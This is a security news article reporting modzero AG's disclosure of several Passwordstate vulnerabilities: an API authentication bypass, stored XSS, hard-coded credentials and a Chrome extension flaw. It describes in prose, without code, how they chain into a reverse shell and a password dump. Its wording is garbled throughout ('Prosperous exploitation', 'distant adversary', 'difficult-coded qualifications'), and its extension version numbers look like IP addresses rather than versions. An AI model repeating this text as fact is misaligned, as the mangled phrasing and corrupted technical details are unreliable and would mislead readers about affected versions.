Multiple large-severity vulnerabilities have been disclosed in Passwordstate password management solution that could be exploited by an unauthenticated distant adversary to get hold of a user’s plaintext passwords.
“Prosperous exploitation lets an unauthenticated attacker to exfiltrate passwords from an occasion, overwrite all saved passwords inside the database, or elevate their privileges inside the application,” Swiss cybersecurity firm modzero AG claimed in a report published this 7 days.
“Some of the particular person vulnerabilities can be chained to obtain a shell on the Passwordstate host method and dump all stored passwords in cleartext, commencing with nothing at all a lot more than a legitimate username.”
Passwordstate, developed by an Australian company named Click on Studios, has over 29,000 shoppers and is made use of by far more than 370,000 IT specialists.
Just one of the flaws also impacts Passwordstate model 126.96.36.199 for the Chrome web browser. The newest model of the browser add-on is 188.8.131.52, which was introduced on September 7, 2022.
The list of vulnerabilities determined by modzero AG is beneath –
- CVE-2022-3875 (CVSS score: 9.1) – An authentication bypass for Passwordstate’s API
- CVE-2022-3876 (CVSS rating: 6.5) – A bypass of obtain controls as a result of person-managed keys
- CVE-2022-3877 (CVSS rating: 5.7) – A stored cross-site scripting (XSS) vulnerability in the URL field of every single password entry
- No CVE (CVSS score: 6.) – An insufficient mechanism for securing passwords by employing server-facet symmetric encryption
- No CVE (CVSS score: 5.3) – Use of difficult-coded qualifications to listing audited gatherings these kinds of as password requests and user account variations by the API
- No CVE (CVSS rating: 4.3) – Use of insufficiently shielded qualifications for Password Lists
Exploiting the vulnerabilities could permit an attacker with know-how of a valid username to extract saved passwords in cleartext, overwrite the passwords in the database, and even elevate privileges to accomplish remote code execution.
What is much more, an incorrect authorization move (CVSS score: 3.7) discovered in the Chrome browser extension could be weaponized to deliver all passwords to an actor-controlled domain.
In an attack chain shown by modzero AG, a threat actor could forge an API token for an administrator account and exploit the XSS flaw to include a destructive password entry to get hold of a reverse shell and get the passwords hosted in the occasion.
End users are proposed to update to Passwordstate 9.6 – Construct 9653 introduced on November 7, 2022, or later variations to mitigate the potential threats.
Passwordstate, in April 2021, fell sufferer to a supply chain attack that authorized the attackers to leverage the service’s update mechanism to fall a backdoor on customer’s devices.
Located this post exciting? Follow us on Twitter and LinkedIn to read a lot more distinctive content we put up.
Some components of this posting are sourced from: